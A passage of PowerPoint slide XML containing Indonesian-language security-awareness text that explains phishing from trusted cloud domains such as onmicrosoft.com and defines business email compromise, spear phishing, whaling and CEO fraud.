              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> onmicrosoft.com. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> phishing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berasal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> example.onmicrosoft.com, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cenderung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempercayainya</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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="653464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Kompromi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Bisnis</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jika phishing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikaitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>massal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompromi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kampanye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>canggih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menargetkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>individu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksekutif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> senior. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyamar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kolega</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mitra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengintaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemahaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendetail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>psikologis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelabui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur-fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jelas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> phishing mailer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>massal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tautan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lampiran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file malware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kendali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> phishing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>istilah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kompromi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>" yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>motivasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>keuangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tujuannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>membujuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pemegang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>anggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mengesahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pembayaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> transfer. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Terminologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>serupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ditargetkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> spear phishing, whaling, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>penipuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> CEO (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>meniru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> CEO), dan angler phishing (</a:t>
